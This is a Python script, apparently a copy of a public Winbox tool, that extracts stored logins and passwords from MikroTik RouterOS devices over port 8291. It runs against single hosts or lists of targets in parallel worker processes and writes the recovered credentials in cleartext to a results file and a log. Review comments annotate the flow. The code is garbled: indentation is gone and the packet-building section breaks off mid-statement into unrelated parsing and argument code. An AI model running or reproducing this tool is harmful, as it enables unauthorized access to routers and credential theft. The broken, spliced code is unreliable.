#!/usr/bin/env python3
#https://github.com/jabberd/RouterOS_Tools/blob/master/winbox-extract-passwords.py
import argparse, binascii, struct, hashlib, time
from multiprocessing import Pool
from io import BytesIO
from socket import *
# File that the final loop of the script appends "host login password" lines to.
results_filename = 'winbox-extract-passwords.log'

# Timing settings; they are not referenced in the visible part of the script.
TIMEOUT, SLEEP_TIME = 5, 0.5

# Packet headers
M2_HEADER = b'M2'  # the same two bytes as b'\x4d\x32'
M2_EXTRA = bytes((0x01, 0x00))

# Message protocol types
MT_BOOL = 0x00
MT_BOOL_CODE = {False: 0x00, True: 0x01}
# Reverse lookup of MT_BOOL_CODE: wire code -> Python bool.
MT_BOOL_VALUE = {code: flag for flag, code in MT_BOOL_CODE.items()}
MT_DWORD, MT_BYTE = 0x08, 0x09
MT_STRING, MT_HASH = 0x21, 0x31
MT_ARRAY = 0x88

# Message protocol constants
MT_RECEIVER, MT_SENDER = 0xff0001, 0xff0002
MT_REPLY_EXPECTED, MT_REQUEST_ID = 0xff0005, 0xff0006
MT_COMMAND = 0xff0007

# Switched on by the debug command-line argument.
DEBUG = False

# Global variables
targets = []             # filled from the target / targets-file arguments
number_of_threads = 50   # default size of the multiprocessing Pool
log = False              # becomes True when a log file is requested
winbox_port = 8291       # default Winbox port; the port argument overrides it
# mtPacket
class mtPacket(object):
def __init__(self):
self.contents = []
self.raw = None
self.ready = False
self.parsed = False
def add(self, id, type, value):
self.contents.append((id, type, value))
def build(self):
buf = BytesIO()
for k in self.contents:
id, type, value = k
if type == MT_BOOL:
type = MT_BOOL_CODE[value]
size_bytes = b''
value_bytes = b''
elif type == MT_DWORD:
size_bytes = b''
value_bytes = struct.pack('H', self.raw[2:4])
if data_size + 4 != packet_size:
raise Exception('Packet header size is incorrect!')
block = self.raw[6:]
pointer = 0
block_size = len(block)
while pointer + 4 < block_size:
id, = struct.unpack(' or --targets/-T ')
exit(1)
elif args['target'] and args['targets']:
print('Please specify either --target/-t option, or --targets/-T , but not both')
exit(1)
elif args['target']:
targets.append(args['target'])
number_of_threads = 1
else:
targetsfile = args['targets']
targets = read_targets(targetsfile)
if targets is None:
print('Error reading the targets file: %s' % targetsfile)
exit(1)
targets_count = len(targets)
if targets_count < number_of_threads:
number_of_threads = targets_count
# Apply the optional command-line overrides, run the worker pool, then write out the results.
# NOTE(review): indentation was lost on this page and earlier parts of the script are missing;
# the nesting of the statements below has to be inferred - confirm against the upstream file.
if args['debug']:
DEBUG = True
# An explicit thread count replaces whatever was chosen above, including the
# single-target value of 1 and the clamp to the number of targets.
if args['threads']:
number_of_threads = args['threads']
if args['port']:
winbox_port = args['port']
if args['log']:
log = True
log_filename = args['log']
# Append mode: existing log content is kept. The handle is closed at the end of the run.
log_file = open(log_filename, 'a')
print('[*] Starting with %s threads' % number_of_threads)
# Despite the "threads" wording these are worker processes (multiprocessing.Pool).
pool = Pool(processes = int(number_of_threads))
# get_userdat is defined outside this excerpt; map() returns one entry per target, in order.
results = pool.map(get_userdat, targets)
pool.close()
pool.join()
print('[!] Finishing...')
# A None entry is skipped; any other entry is iterated as (host, login, password) tuples.
for r in results:
if r is not None:
for t in r:
host, login, password = t
out = host + ' ' + login + ' ' + password
# NOTE(review): results_file_opened is not assigned anywhere in the visible text -
# presumably initialised to False earlier; confirm.
# The results file is opened lazily, in append mode, on the first recovered entry.
if not results_file_opened:
results_file = open(results_filename, 'a')
results_file_opened = True
# SECURITY: the password is written in cleartext here and in the log line below, and
# open() creates both files with the process's default permissions (umask). Treat the
# files as credential stores: restrict access and remove them once no longer needed.
results_file.write(out + '\n')
if log:
log_file.write(host + '\t' + login + '\t' + password + '\n')
# No try/finally or "with" is used, so an exception above would leave these handles
# to be closed only at interpreter exit.
if results_file_opened:
results_file.close()
if log:
log_file.close()